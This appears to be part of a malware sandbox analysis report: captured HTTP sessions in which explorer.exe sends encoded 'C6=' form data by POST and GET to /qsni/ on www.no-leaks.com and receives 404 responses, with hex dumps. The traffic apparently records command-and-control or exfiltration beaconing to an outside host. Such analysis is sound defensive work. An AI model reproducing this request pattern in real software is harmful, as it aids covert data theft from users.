                                                                                          Data Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 37 71 30 52 63 6a 61 36 39 4e 5f 6a 47 79 67 46 4b 54 67 54 36 44 61 64 56 68 4b 68 75 76 37 46 55 6c 4a 41 59 70 6a 59 73 41 72 46 43 4c 35 30 69 75 32 63 4f 31 77 4b 45 6e 69 4e 79 52 57 6a 44 4c 66 75 6a 4e 67 72 6e 43 49 46 67 47 7a 52 58 56 59 42 47 63 61 28 43 36 4f 52 54 41 39 51 64 6a 7a 7e 36 38 45 5a 78 36 73 75 5f 6a 4b 45 2d 76 36 44 2d 76 6c 57 4d 74 65 49 67 56 6f 7a 58 73 75 28 4f 51 49 48 76 30 34 55 45 41 64 39 41 68 43 6f 48 57 39 74 78 47 58 38 71 54 55 61 4b 46 56 65 42 4d 55 39 48 51 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=hhrrKzuTFil2V7q0Rcja69N_jGygFKTgT6DadVhKhuv7FUlJAYpjYsArFCL50iu2cO1wKEniNyRWjDLfujNgrnCIFgGzRXVYBGca(C6ORTA9Qdjz~68EZx6su_jKE-v6D-vlWMteIgVozXsu(OQIHv04UEAd9AhCoHW9txGX8qTUaKFVeBMU9HQ.
                                                                                          Mar 30, 2023 10:23:48.405769110 CEST102INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:23:48 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          10192.168.2.649717156.226.207.8180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:21.387026072 CEST120OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.no-leaks.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.no-leaks.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.no-leaks.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 37 32 5a 42 50 6a 53 37 7a 4c 45 73 77 42 6c 49 64 54 41 36 78 76 6b 72 49 6b 67 6e 37 53 74 70 76 58 4e 45 73 34 4a 4a 4d 6a 28 64 57 6b 65 2d 76 6b 6b 4e 55 52 6e 36 53 64 58 33 4e 6d 35 67 66 4d 61 34 6a 54 4e 7a 66 41 28 79 28 72 55 74 36 56 57 4f 4e 2d 6a 6f 4d 6c 33 39 67 6c 67 4e 4d 68 69 5a 62 75 61 48 75 77 53 44 31 45 76 79 44 66 76 71 74 6e 4e 65 6e 43 46 6d 32 7a 33 32 52 4a 46 77 43 69 35 33 32 4a 56 78 35 61 73 44 68 61 74 5f 68 4c 42 6a 51 67 50 63 63 73 70 68 4f 51 76 41 6e 75 42 59 67 38 34 79 54 33 65 5f 79 31 7a 7a 4b 53 51 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=72ZBPjS7zLEswBlIdTA6xvkrIkgn7StpvXNEs4JJMj(dWke-vkkNURn6SdX3Nm5gfMa4jTNzfA(y(rUt6VWON-joMl39glgNMhiZbuaHuwSD1EvyDfvqtnNenCFm2z32RJFwCi532JVx5asDhat_hLBjQgPccsphOQvAnuBYg84yT3e_y1zzKSQ.
                                                                                          Mar 30, 2023 10:24:21.820714951 CEST121INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:24:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 37 66 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 59 49 6f 1c 45 14 be 23 f1 1f 8a 8e 50 16 75 8f 67 b1 c7 e3 f1 d8 22 98 40 90 92 10 29 21 52 84 40 aa ee ae 71 97 dc dd d5 aa ae 19 cf 10 e5 c8 91 03 37 24 e0 00 27 2e c0 09 09 09 c1 af 21 12 fe 17 bc ea b5 aa 7a f1 24 27 3c 92 47 53 cb ab b7 7e ef d5 ab c5 3b 1f 7c 72 f6 f4 f9 e3 7b 28 10 51 78 fa f6 5b 8b ea 9b 60 1f 7e 23 f8 5b 44 44 60 e4 05 98 a7 44 9c 58 9f 3e fd d0 99 59 e5 9c a0 22 24 a7 4f b6 a9 20 11 ba c7 39 e3 8b bd 7c 4c dd 1c e3 88 9c 58 9c b9 4c a4 16 f2 58 2c 48 0c a4 62 46 63 9f 6c ec 98 2d 59 18 b2 4b 0b ed 69 67 e6 db d6 94 5c 26 8c 0b 65 e3 25 f5 45 70 e2 93 35 f5 88 93 fd b0 11 8d a9 a0 38 74 52 0f 87 e4 64 64 a3 55 4a 78 f6 0b bb 30 10 b3 8a e7 54 6c 81 e7 9c 3f 29 e0 de 1d f4 3e 4e 09 ba b3 57 8f b9 cc df a2 17 f5 6f b9 ce 63 21 e3 73 74 63 32 99 1c eb 33 4b 90 68 8e 46 fb c9 06 3d 23 dc c7 31 b6 91 75 9f 84 6b 22 a8 87 d1 23 b2 22 96 8d 82 72 c0 46 77 39 b0 6a a3 9b 0f a9 c7 59 ca 96 02 3d c7 f7 09 bd 69 a3 14 c7 a9 03 9c d3 a5 71 46 84 f9 39 8d e7 68 68 8c 27 d8 f7 69 7c 0e 13 68 3c 04 06 e4 3f 63 c9 25 e3 be e3 72 82 2f e6 28 fb 72 e4 88 b2 e8 65 2d 4e 30 32 a4 2e cf 1d 49 e2 c3 c6 f1 52 74 27 a5 5f 92 39 1a cf 1a 27 67 b3 97 84 9e 07 a0 9f 83 a1 c9 7b 48 63 e2 04 c5 f4 64 ac 6d 57 79 1a 77 58 62 7f 3c 9b 79 a4 c5 18 d5 99 fb 8d 33 2b 7d 4d a5 3c 1d 4a ce e6 1a b3 8a ac a3 a6 ac 2e e8 14 3c 0e 7c 5c b0 08 bc 01 48 a4 2c a4 3e ba 41 88 ca a3 2a d8 64 90 ae dc 00 62 0d 2c d8 e5 6e ad 42 96 56 e9 61 b4 54 bb ae 02 ed f4 2e 53 eb 96 90 be af 8a 0e 67 f6 a9 dc 65 61 87 6f 61 d7 e5 a6 25 57 3c 95 41 05 b1 91 18 44 05 d9 08 c7 27 1e e3 58 50 06 9e bf 02 b0 e0 d2 65 fa 17 3a 59 7c cf 91 0f 86 20 5d 9c 98 6c 14 a1 3d 9b ca 8f 41 df 2b 78 4c 00 ae 04 e1 ca ac a2 4c 3c 0f d8 9a 98 e2 ed 24 83 42 65 90 45 04 91 38 6a 70 e8 62 ef e2 9c 33 d0 01 20 d0 72 e6 b9 9e ab 33 52 87 f0 80 78 01 43 42 c2 9e e9 53 19 56 82 6f 0e 87 ef f6 ef 4e 78 63 6f 15 38 a3 a6 03 48 d1 97 80 e0 73 84 57 82 19 fa 53 7c 67 76 a0 9e 2b 1d 4b 83 80 d1 60 ff c0 d8 5c cb ed 94 f8 bb 3c 94 1f 73 5d 16 7d 4d 78 2c a2 92 43 88 ad d2 39 9a b4 fb ee 12 47 34 dc ce d1 19 8b 21 66 71 0a f0 fd 80 ba 24 f7 3c f4 90 41 f6 b0 d1 43 12 87 cc 86 35 2b 4e 09 b7 51 04 c3 69 82 35 00 02 5b 9a 86 90 aa 3c 45 7d 0a ed 42 21 75 5c 71 12 c8 57 0f f0 96 ad 84 96 b1 06 a0 1e 27 f2 9d 49 87 cd c7 9a ea 55 9f 2b 36 1e 75 6c 3c ec da f8 99 07 9a 4a bf 38 b1 0a 02 d6 e7 26 05 70 09 0c c0 1f 92 a5 68 8f 9a 81 17 12 cc 97 74 63 ee cc c6 e7 80 a5 41 fb c6 f7 22 e2 53 8c 58 1c 6e 51 ea 71 42 62 54 eb 1d c7 3e ba 15 d1 18 d0 a3 ae 10 10 18 ff f0 20 d9 dc 6e 2c c4 1b 73 e1 74 7a 28 17 be 50 96 4a 5f ad 54 6c eb e9 bf 1c 6f 68 50 6e 6a 0f 39 39 a3 d8 40 b7 ee bd 8d 47 12 89 79 e8 e3 78 c9 74 2b 93 6a ce 00 88 3c 23 38 82 25 90 89 f5 1a 40 35 76 bd 7f 10 91 34 c5 e7 c4 a0 53 87 79 33 0b e4 c1 a4 e5 36 df 57 21 56 8a 65 e4 c1 21 8a 59 03 b2 f5 a8 6f e6 d2 1a 32 5a c0 a6 38 00 24 75 a4 67 39 65 6c 43 f9 d5 0a 0a 52 27 0e 97 35 48 cf d2 ec c4 06 0c 34 51 a0 8c fe b2 ce b3 5e fd fd eb bf 7f fd 76 f5 dd 57 57 7f 7e 63 e9 ce aa 22 41 65 36 70 16 df d4 79 7b 9c 48 65 66 09 04 87 f4 1c f2 9f 07 45 b3 96 7e e4 82 0a 14 97 ed 05 63 2e 38 98 ac 69 cd 3e 40 37 60 b3 45 b5 6a 3e
                                                                                          Data Ascii: 7f9YIoE#Pug"@)!R@q7$'.!z$'<GS~;|r{(Qx[`~#[DD`DX>Y"$O 9|LXLX,HbFcl-YKig\&e%Ep58tRddUJx0Tl?)>NWoc!stc23KhF=#1uk"#"rFw9jY=iqF9hh'i|h<?c%r/(re-N02.IRt'_9'g{HcdmWywXb<y3+}M<J.<|\H,>A*db,nBVaT.Sgeaoa%W<AD'XPe:Y| ]l=A+xLL<$BeE8jpb3 r3RxCBSVoNxco8HsWS|gv+K`\<s]}Mx,C9G4!fq$<AC5+NQi5[<E}B!u\qW'IU+6ul<J8&phtcA"SXnQqBbT> n,stz(PJ_TlohPnj99@Gyxt+j<#8%@5v4Sy36W!Ve!Yo2Z8$ug9elCR'5H4Q^vWW~c"Ae6py{HefE~c.8i>@7`Ej>
                                                                                          Mar 30, 2023 10:24:21.820753098 CEST122INData Raw: 3a 3a 3a 6a 0f d3 81 e2 6e 29 e0 26 94 eb 2d e2 ab 25 59 ab 05 5b 3c 4e 8f 40 3d 3b 1e 2d e1 63 10 2a 33 94 b3 a9 72 54 4d a2 23 40 14 8e 25 7e b7 06 9c 9e 71 76 23 84 58 b8 03 2d d5 ba ad 35 a0 4f d3 24 c4 90 b5 68 9c c5 93 1b 32 ef c2 10 5b a2
                                                                                          Data Ascii: :::jn)&-%Y[<N@=;-c*3rTM#@%~qv#X-5O$h2[`7l#kPDJ6]@s#lYvJ!TrJi:Roke^I]2/5[CESAp(*w&$t4cR0w;-


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          11192.168.2.649718156.226.207.8180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:24.261650085 CEST125OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.no-leaks.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.no-leaks.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.no-leaks.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 37 32 5a 42 50 6a 53 37 7a 4c 45 73 69 30 74 49 4f 6c 49 36 35 76 6b 6f 57 30 67 6e 78 79 74 74 76 57 78 45 73 36 6c 5a 4c 57 50 64 57 58 57 2d 76 47 4d 4e 57 52 6e 36 47 74 58 7a 51 57 35 49 66 4d 50 48 6a 54 64 4e 66 44 54 79 7e 4b 45 74 38 51 4c 59 47 75 6a 6d 65 56 33 36 67 6c 67 59 4d 6c 4f 56 62 75 76 69 75 77 61 44 31 79 54 79 42 76 76 31 6a 48 4e 65 6e 43 46 63 32 7a 32 6a 52 4e 68 6f 43 67 49 6f 31 37 39 78 35 34 6b 44 6e 35 46 34 74 62 42 6e 5a 41 4f 63 64 74 30 51 56 69 53 6b 78 76 5a 6a 35 35 45 48 66 6b 54 44 76 77 6a 45 54 55 79 74 6c 56 73 67 47 4a 64 58 28 61 6b 56 54 79 72 73 59 71 61 55 76 7a 6a 79 78 4d 62 74 77 5f 6a 53 4e 4c 6e 45 66 33 4f 69 56 74 6a 39 65 30 42 43 34 4a 67 58 66 48 6c 69 61 4f 78 56 5a 57 4a 7a 68 5a 58 38 71 78 63 73 57 2d 50 76 32 59 53 4b 6e 36 54 42 67 33 72 72 73 52 31 58 4a 4a 38 6f 30 6c 69 30 4d 33 41 6f 75 45 52 2d 41 62 73 36 7a 5f 43 69 6d 4a 52 58 4e 69 6f 4e 31 6c 51 65 62 6e 30 34 34 44 74 30 49 6d 34 5a 4c 7a 51 77 49 59 53 62 63 42 48 75 4b 5f 71 74 75 41 68 46 55 6e 72 47 4e 52 61 71 7a 4d 61 31 32 72 33 50 77 46 38 38 57 48 66 52 67 79 64 34 59 2d 4c 78 57 57 36 49 6c 43 61 42 6b 6f 54 7a 64 71 65 70 69 34 65 6d 43 30 34 59 45 63 46 4e 36 38 55 44 44 35 48 72 69 43 52 37 71 4e 74 4e 30 70 31 33 53 38 65 69 36 6b 79 4a 73 30 77 36 4f 78 53 4c 72 78 62 47 74 71 77 70 43 77 37 46 34 7a 6d 6f 4e 4f 54 79 41 4c 53 4a 73 4f 49 46 28 34 4e 56 55 51 43 43 4f 6a 58 54 79 4d 6f 32 4b 66 31 4e 4f 33 39 53 32 61 46 66 66 75 45 65 50 4b 46 32 4c 75 78 4e 53 32 66 76 34 73 63 45 34 2d 53 57 7e 5a 64 4f 34 63 45 75 47 53 65 71 48 42 50 56 37 6c 41 6f 5a 6d 52 6d 7a 59 56 44 4e 68 4d 33 45 34 43 74 6b 67 76 43 43 6c 4a 70 75 7a 73 30 36 61 64 74 35 52 68 6a 47 32 79 2d 7a 39 36 73 4a 44 48 42 30 36 74 73 44 6a 53 4a 73 35 33 63 49 63 67 2d 32 7a 59 7a 37 57 51 56 68 61 6b 42 56 43 6c 77 51 47 48 33 41 6c 74 66 73 47 42 50 45 61 6e 78 71 64 55 2d 6c 31 71 55 34 77 37 69 31 44 56 4f 51 4c 33 53 6b 75 4c 79 38 68 78 6f 38 59 6c 37 6c 30 74 44 78 58 67 57 5a 38 74 41 30 31 43 41 69 37 53 55 64 53 48 57 4e 6a 28 2d 51 67 4b 63 50 67 33 56 49 41 6a 4d 31 75 30 62 77 6e 52 54 58 53 4b 65 6b 6a 33 6e 37 66 49 57 37 51 61 53 4b 61 63 5f 4c 5f 37 4b 72 61 34 43 39 75 45 7a 56 67 69 51 7e 42 58 4f 4b 4b 53 31 57 49 47 62 76 72 52 51 73 38 71 59 34 61 7e 36 45 31 75 75 37 6d 46 6c 74 64 79 4e 39 46 44 34 59 66 41 73 46 6d 4e 6c 76 49 35 78 64 58 31 43 55 63 46 58 28 34 49 32 64 6c 58 77 34 68 50 42 44 55 62 58 5a 56 66 75 38 72 55 6b 47 6d 69 44 6b 48 33 63 4e 52 51 5f 68 4e 67 31 59 4d 54 35 74 4a 65 41 4d 73 4f 46 77 64 32 47 43 65 45 34 4a 4d 45 41 45 31 69 6a 70 47 68 59 68 36 68 79 34 4f 44 62 67 78 62 76 6e 6d 68 51 56 56 38 51 28 46 7e 62 67 64 28 4f 79 67 6b 65 35 48 6d 57 30 42 57 67 77 51 4a 34 6c 47 66 65 50 48 71 43 68 4a 70 4c 34 2d 55 61 74 43 71 35 57 65 28 75 36 64 50 32 45 78 76 5f 33 6a 4f 34 6d 61 4f 31 39 6c 74 70 4a 5a 4c 50 63 78 34 6c 54 5f 6c 39 4a 54 39 32 39 44 34 57 78 2d 39 71 46 39 75 59 28 6b 63 56 62 50 41 7a 4b 33 50 2d 66 44 67 71 36 63 72 4f 52 77 6b 67 54 4a 4d 59 4b 4e 72 4b 41 64 71 6c 4f 45 56 38 54 6a 55 37 57 78 61 34 74 78 74 76 53 78 78 46 69 68 6c 66 72 56 36 73 69 72 49 5a 6c 78 79 73 6c 39 6a 6f 7e 34 76 47 42 52 4b 6f 6c 44 42 62 67 37 79 5f 61 61 63 72 5a 6a 73 76 43 46 58 69 51 49 4c 4d 42 71 63 2d 28 42 6d 73 75 5f 72 35 68 4a 79 31 77 36 41 62 35 53 70 33 6b 67 71 33 36 4f 62 44 34 6f 54 62 74 72 76 6d 33 52 35 43 4b 66 44 54 55 46 44 6b 4e 79 49 78 7a 6c 78 34 30 78 79 75 5a 75 6e 6e 7a 50 4b 70 46 31 56 50 61 4b 47 4b 77 64 54 62 65 38 6b 6a 54 39 47 64 76 69 68 66 6b 75 6a 57 6c 43 75 30 4f 44 57 2d 64 30 39 72 75 46 70 46 6e 47 49 77 51 30 6c 59 44 36 77 72 75 38 65 32 6f 59 42 41 48 4f 7e 61 65 53 73 42 72 45 5a 74 30 4a 43 56 6b 31 4c 73 70 6e 43 4e 33 32 57 36 4a 36 74 4c 4a 32 78 50 43 4d 6e 49 51 56 42 49 36 34 71 79 73 61 32 70 77 4e 38 6f 43 59 45 68 30 47 6f 6b 31 65 57 38 5a 66 71 6d 74 6e 61 66 7e 63 43 6e 44 63 61 5f 69 4a 64 32 73 41 4e 31 69 4a 37 58 4a 6d 42 30 75 66 63 51 76 54 35 67 53 61 35 32 41 52 64 76
                                                                                          Data Ascii: C6=72ZBPjS7zLEsi0tIOlI65vkoW0gnxyttvWxEs6lZLWPdWXW-vGMNWRn6GtXzQW5IfMPHjTdNfDTy~KEt8QLYGujmeV36glgYMlOVbuviuwaD1yTyBvv1jHNenCFc2z2jRNhoCgIo179x54kDn5F4tbBnZAOcdt0QViSkxvZj55EHfkTDvwjETUytlVsgGJdX(akVTyrsYqaUvzjyxMbtw_jSNLnEf3OiVtj9e0BC4JgXfHliaOxVZWJzhZX8qxcsW-Pv2YSKn6TBg3rrsR1XJJ8o0li0M3AouER-Abs6z_CimJRXNioN1lQebn044Dt0Im4ZLzQwIYSbcBHuK_qtuAhFUnrGNRaqzMa12r3PwF88WHfRgyd4Y-LxWW6IlCaBkoTzdqepi4emC04YEcFN68UDD5HriCR7qNtN0p13S8ei6kyJs0w6OxSLrxbGtqwpCw7F4zmoNOTyALSJsOIF(4NVUQCCOjXTyMo2Kf1NO39S2aFffuEePKF2LuxNS2fv4scE4-SW~ZdO4cEuGSeqHBPV7lAoZmRmzYVDNhM3E4CtkgvCClJpuzs06adt5RhjG2y-z96sJDHB06tsDjSJs53cIcg-2zYz7WQVhakBVClwQGH3AltfsGBPEanxqdU-l1qU4w7i1DVOQL3SkuLy8hxo8Yl7l0tDxXgWZ8tA01CAi7SUdSHWNj(-QgKcPg3VIAjM1u0bwnRTXSKekj3n7fIW7QaSKac_L_7Kra4C9uEzVgiQ~BXOKKS1WIGbvrRQs8qY4a~6E1uu7mFltdyN9FD4YfAsFmNlvI5xdX1CUcFX(4I2dlXw4hPBDUbXZVfu8rUkGmiDkH3cNRQ_hNg1YMT5tJeAMsOFwd2GCeE4JMEAE1ijpGhYh6hy4ODbgxbvnmhQVV8Q(F~bgd(Oygke5HmW0BWgwQJ4lGfePHqChJpL4-UatCq5We(u6dP2Exv_3jO4maO19ltpJZLPcx4lT_l9JT929D4Wx-9qF9uY(kcVbPAzK3P-fDgq6crORwkgTJMYKNrKAdqlOEV8TjU7Wxa4txtvSxxFihlfrV6sirIZlxysl9jo~4vGBRKolDBbg7y_aacrZjsvCFXiQILMBqc-(Bmsu_r5hJy1w6Ab5Sp3kgq36ObD4oTbtrvm3R5CKfDTUFDkNyIxzlx40xyuZunnzPKpF1VPaKGKwdTbe8kjT9GdvihfkujWlCu0ODW-d09ruFpFnGIwQ0lYD6wru8e2oYBAHO~aeSsBrEZt0JCVk1LspnCN32W6J6tLJ2xPCMnIQVBI64qysa2pwN8oCYEh0Gok1eW8Zfqmtnaf~cCnDca_iJd2sAN1iJ7XJmB0ufcQvT5gSa52ARdvR9myvpDL~ieUFIbBYKz0ParkKFBxre3xq9HcYaXON1Cv~SbMYP3JM2fig0KtlndJkhKj8A3fRlcFub1wnKZh2ac.
                                                                                          Mar 30, 2023 10:24:24.670191050 CEST126INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:24:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 37 66 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 59 49 6f 1c 45 14 be 23 f1 1f 8a 8e 50 16 75 8f 67 b1 c7 e3 f1 d8 22 98 40 90 92 10 29 21 52 84 40 aa ee ae 71 97 dc dd d5 aa ae 19 cf 10 e5 c8 91 03 37 24 e0 00 27 2e c0 09 09 09 c1 af 21 12 fe 17 bc ea b5 aa 7a f1 24 27 3c 92 47 53 cb ab b7 7e ef d5 ab c5 3b 1f 7c 72 f6 f4 f9 e3 7b 28 10 51 78 fa f6 5b 8b ea 9b 60 1f 7e 23 f8 5b 44 44 60 e4 05 98 a7 44 9c 58 9f 3e fd d0 99 59 e5 9c a0 22 24 a7 4f b6 a9 20 11 ba c7 39 e3 8b bd 7c 4c dd 1c e3 88 9c 58 9c b9 4c a4 16 f2 58 2c 48 0c a4 62 46 63 9f 6c ec 98 2d 59 18 b2 4b 0b ed 69 67 e6 db d6 94 5c 26 8c 0b 65 e3 25 f5 45 70 e2 93 35 f5 88 93 fd b0 11 8d a9 a0 38 74 52 0f 87 e4 64 64 a3 55 4a 78 f6 0b bb 30 10 b3 8a e7 54 6c 81 e7 9c 3f 29 e0 de 1d f4 3e 4e 09 ba b3 57 8f b9 cc df a2 17 f5 6f b9 ce 63 21 e3 73 74 63 32 99 1c eb 33 4b 90 68 8e 46 fb c9 06 3d 23 dc c7 31 b6 91 75 9f 84 6b 22 a8 87 d1 23 b2 22 96 8d 82 72 c0 46 77 39 b0 6a a3 9b 0f a9 c7 59 ca 96 02 3d c7 f7 09 bd 69 a3 14 c7 a9 03 9c d3 a5 71 46 84 f9 39 8d e7 68 68 8c 27 d8 f7 69 7c 0e 13 68 3c 04 06 e4 3f 63 c9 25 e3 be e3 72 82 2f e6 28 fb 72 e4 88 b2 e8 65 2d 4e 30 32 a4 2e cf 1d 49 e2 c3 c6 f1 52 74 27 a5 5f 92 39 1a cf 1a 27 67 b3 97 84 9e 07 a0 9f 83 a1 c9 7b 48 63 e2 04 c5 f4 64 ac 6d 57 79 1a 77 58 62 7f 3c 9b 79 a4 c5 18 d5 99 fb 8d 33 2b 7d 4d a5 3c 1d 4a ce e6 1a b3 8a ac a3 a6 ac 2e e8 14 3c 0e 7c 5c b0 08 bc 01 48 a4 2c a4 3e ba 41 88 ca a3 2a d8 64 90 ae dc 00 62 0d 2c d8 e5 6e ad 42 96 56 e9 61 b4 54 bb ae 02 ed f4 2e 53 eb 96 90 be af 8a 0e 67 f6 a9 dc 65 61 87 6f 61 d7 e5 a6 25 57 3c 95 41 05 b1 91 18 44 05 d9 08 c7 27 1e e3 58 50 06 9e bf 02 b0 e0 d2 65 fa 17 3a 59 7c cf 91 0f 86 20 5d 9c 98 6c 14 a1 3d 9b ca 8f 41 df 2b 78 4c 00 ae 04 e1 ca ac a2 4c 3c 0f d8 9a 98 e2 ed 24 83 42 65 90 45 04 91 38 6a 70 e8 62 ef e2 9c 33 d0 01 20 d0 72 e6 b9 9e ab 33 52 87 f0 80 78 01 43 42 c2 9e e9 53 19 56 82 6f 0e 87 ef f6 ef 4e 78 63 6f 15 38 a3 a6 03 48 d1 97 80 e0 73 84 57 82 19 fa 53 7c 67 76 a0 9e 2b 1d 4b 83 80 d1 60 ff c0 d8 5c cb ed 94 f8 bb 3c 94 1f 73 5d 16 7d 4d 78 2c a2 92 43 88 ad d2 39 9a b4 fb ee 12 47 34 dc ce d1 19 8b 21 66 71 0a f0 fd 80 ba 24 f7 3c f4 90 41 f6 b0 d1 43 12 87 cc 86 35 2b 4e 09 b7 51 04 c3 69 82 35 00 02 5b 9a 86 90 aa 3c 45 7d 0a ed 42 21 75 5c 71 12 c8 57 0f f0 96 ad 84 96 b1 06 a0 1e 27 f2 9d 49 87 cd c7 9a ea 55 9f 2b 36 1e 75 6c 3c ec da f8 99 07 9a 4a bf 38 b1 0a 02 d6 e7 26 05 70 09 0c c0 1f 92 a5 68 8f 9a 81 17 12 cc 97 74 63 ee cc c6 e7 80 a5 41 fb c6 f7 22 e2 53 8c 58 1c 6e 51 ea 71 42 62 54 eb 1d c7 3e ba 15 d1 18 d0 a3 ae 10 10 18 ff f0 20 d9 dc 6e 2c c4 1b 73 e1 74 7a 28 17 be 50 96 4a 5f ad 54 6c eb e9 bf 1c 6f 68 50 6e 6a 0f 39 39 a3 d8 40 b7 ee bd 8d 47 12 89 79 e8 e3 78 c9 74 2b 93 6a ce 00 88 3c 23 38 82 25 90 89 f5 1a 40 35 76 bd 7f 10 91 34 c5 e7 c4 a0 53 87 79 33 0b e4 c1 a4 e5 36 df 57 21 56 8a 65 e4 c1 21 8a 59 03 b2 f5 a8 6f e6 d2 1a 32 5a c0 a6 38 00 24 75 a4 67 39 65 6c 43 f9 d5 0a 0a 52 27 0e 97 35 48 cf d2 ec c4 06 0c 34 51 a0 8c fe b2 ce b3 5e fd fd eb bf 7f fd 76 f5 dd 57 57 7f 7e 63 e9 ce aa 22 41 65 36 70 16 df d4 79 7b 9c 48 65 66 09 04 87 f4 1c f2 9f 07 45 b3 96 7e e4 82 0a 14 97 ed 05 63 2e 38 98 ac 69 cd 3e 40 37 60 b3 45 b5 6a 3e
                                                                                          Data Ascii: 7f9YIoE#Pug"@)!R@q7$'.!z$'<GS~;|r{(Qx[`~#[DD`DX>Y"$O 9|LXLX,HbFcl-YKig\&e%Ep58tRddUJx0Tl?)>NWoc!stc23KhF=#1uk"#"rFw9jY=iqF9hh'i|h<?c%r/(re-N02.IRt'_9'g{HcdmWywXb<y3+}M<J.<|\H,>A*db,nBVaT.Sgeaoa%W<AD'XPe:Y| ]l=A+xLL<$BeE8jpb3 r3RxCBSVoNxco8HsWS|gv+K`\<s]}Mx,C9G4!fq$<AC5+NQi5[<E}B!u\qW'IU+6ul<J8&phtcA"SXnQqBbT> n,stz(PJ_TlohPnj99@Gyxt+j<#8%@5v4Sy36W!Ve!Yo2Z8$ug9elCR'5H4Q^vWW~c"Ae6py{HefE~c.8i>@7`Ej>
                                                                                          Mar 30, 2023 10:24:24.670249939 CEST127INData Raw: 3a 3a 3a 6a 0f d3 81 e2 6e 29 e0 26 94 eb 2d e2 ab 25 59 ab 05 5b 3c 4e 8f 40 3d 3b 1e 2d e1 63 10 2a 33 94 b3 a9 72 54 4d a2 23 40 14 8e 25 7e b7 06 9c 9e 71 76 23 84 58 b8 03 2d d5 ba ad 35 a0 4f d3 24 c4 90 b5 68 9c c5 93 1b 32 ef c2 10 5b a2
                                                                                          Data Ascii: :::jn)&-%Y[<N@=;-c*3rTM#@%~qv#X-5O$h2[`7l#kPDJ6]@s#lYvJ!TrJi:Roke^I]2/5[CESAp(*w&$t4cR0w;-


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          12192.168.2.649719156.226.207.8180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:27.135699987 CEST128OUTGET /qsni/?ZOm=dXna0d&C6=20xhMWbp2rhGgEBmOnN/yuEbcH426mhGgRtw9KpGIAL9OE+0hkYwLlKlZ9z7J35lfOa8jhk9Snj95+wj7juHJ9vXTEnViFsBbwnkbfnQvm3P HTTP/1.1
                                                                                          Host: www.no-leaks.com
                                                                                          Connection: close
